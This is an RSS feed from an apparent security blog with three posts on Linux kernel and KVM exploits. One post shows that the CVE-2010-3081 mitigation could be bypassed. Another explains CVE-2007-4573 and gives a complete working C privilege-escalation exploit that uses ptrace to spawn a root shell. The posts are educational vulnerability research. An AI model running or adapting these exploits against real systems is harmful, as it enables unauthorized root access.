<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; exploits</title>
	<atom:link href="http://blog.nelhage.com/tag/exploits/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
			<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered and announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publicly documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. Thus, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system, means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>
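
<p>To make the wraparound concrete, here is a small userspace model of the arithmetic. It is only a sketch: <code>model_alloc</code> is a hypothetical stand-in for <code>compat_alloc_user_space</code>, and the stack pointer and length values mentioned below are made up for illustration.</p>

<pre><code>#include &lt;stdint.h&gt;

/* Hypothetical userspace model of compat_alloc_user_space():
 * subtract len from the saved user stack pointer, modulo 2^64. */
static uint64_t model_alloc(uint64_t sp, uint64_t len)
{
    return sp - len;
}
</code></pre>

<p>With a 32-bit stack pointer of <code>0xffffd000</code> and a <code>len</code> of 64, this returns <code>0xffffcfc0</code>, still below 4 GB. With a stack pointer of <code>0x08000000</code> and a <code>len</code> of <code>0x88000000</code>, the subtraction wraps and returns <code>0xffffffff80000000</code>, which is a kernel address.</p>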

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targeted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
make <code>compat_alloc_user_space</code> return any value you please!</p>

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8221;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>
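
<p>As a rough sketch of the arithmetic involved, the helper below works out which stack pointer value makes the <code>__put_user</code> land on a chosen address. The name <code>rsp_for_write</code> is hypothetical, and the code assumes that the userspace <code>struct ifreq</code> from <code>&lt;net/if.h&gt;</code> has the same layout as the kernel&#8217;s on the target system.</p>

<pre><code>#define _DEFAULT_SOURCE
#include &lt;net/if.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Hypothetical helper: pick the %rsp value to load before int $0x80 so
 * that the __put_user() above writes to `target`.
 * Assumes the kernel's struct ifreq matches the userspace layout. */
static uint64_t rsp_for_write(uint64_t target)
{
    /* The write goes to &amp;u_ifreq64-&gt;ifr_ifru.ifru_data, so step back
     * from the target to the start of the structure. */
    uint64_t u_ifreq64 = target - offsetof(struct ifreq, ifr_ifru.ifru_data);

    /* compat_alloc_user_space() returned sp - sizeof(struct ifreq),
     * so undo that subtraction to recover the stack pointer. */
    return u_ifreq64 + sizeof(struct ifreq);
}
</code></pre>

<p>Because all of the arithmetic is modulo 2^64, any target address has a matching stack pointer value.</p>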

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Based on this observation, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publicly
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is that you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows. (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in Linus&#8217;s git repository.) Note that this patch was applied to v2.6.22.
These files have moved around since, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>LOAD_ARGS32</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>
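
<p>The difference between the two macros can be modeled in C. This is an illustrative sketch rather than kernel code, and both function names are hypothetical.</p>

<pre><code>#include &lt;stdint.h&gt;

/* Models a movq load (LOAD_ARGS): all 64 bits of the saved slot
 * end up in the register. */
static uint64_t load_args(uint64_t slot)
{
    return slot;
}

/* Models a movl load (LOAD_ARGS32): only the low 32 bits are read,
 * and the upper half of the destination register is cleared. */
static uint64_t load_args32(uint64_t slot)
{
    return (uint32_t)slot;
}
</code></pre>

<p>For a saved slot containing <code>0x100000003</code>, <code>load_args</code> yields <code>0x100000003</code> while <code>load_args32</code> yields <code>0x3</code>.</p>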

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>movl</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task, sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
As long as <code>%eax</code> is no greater than <code>(IA32_NR_syscalls-1)</code>, <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>
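
<p>The mismatch between the check and the dispatch can be sketched in C. This is a model under stated assumptions, not kernel code: <code>model_dispatch</code> is a hypothetical name, and <code>MODEL_NR_SYSCALLS</code> is a placeholder rather than the real value of <code>IA32_NR_syscalls</code>.</p>

<pre><code>#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* Placeholder table size for illustration only. */
#define MODEL_NR_SYSCALLS 320u

/* Returns false for the ia32_badsys path; otherwise stores the index
 * that the call instruction would actually use. */
static bool model_dispatch(uint64_t rax, uint64_t *index)
{
    /* cmpl $(IA32_NR_syscalls-1),%eax ; ja ia32_badsys
     * Only the low 32 bits of rax are compared. */
    if ((uint32_t)rax &gt; MODEL_NR_SYSCALLS - 1)
        return false;

    /* call *ia32_sys_call_table(,%rax,8)
     * All 64 bits of rax are used as the index. */
    *index = rax;
    return true;
}
</code></pre>

<p>An <code>%rax</code> of <code>(1 &lt;&lt; 32) | 5</code> passes the check because its low 32 bits are 5, yet the index that gets used is the full 64-bit value.</p>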

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers before the system call proceeds.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall.</li>
<li>Have the traced process execute an <code>int $0x80</code>.</li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>
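
<p>A short sketch of that address computation follows. The helper names are hypothetical, and <code>is_user_address</code> assumes the usual 47-bit user address range on <code>x86_64</code>.</p>

<pre><code>#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* Address of the table slot read for a given index, computed
 * modulo 2^64 like the effective address in the call instruction. */
static uint64_t slot_address(uint64_t table, uint64_t index)
{
    return table + 8 * index;
}

/* True if addr lies in the lower (user) half of the address space,
 * assuming a 47-bit user range. */
static bool is_user_address(uint64_t addr)
{
    return addr &lt; (1ULL &lt;&lt; 47);
}
</code></pre>

<p>For example, with a table at <code>0xffffffff8044b8a0</code> and an index of <code>1 &lt;&lt; 32</code>, the slot address wraps around to <code>0x78044b8a0</code>, which an ordinary process can map.</p>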

<p>My entire exploit code follows. This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into calling it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork into two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  All we need to do in the parent is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

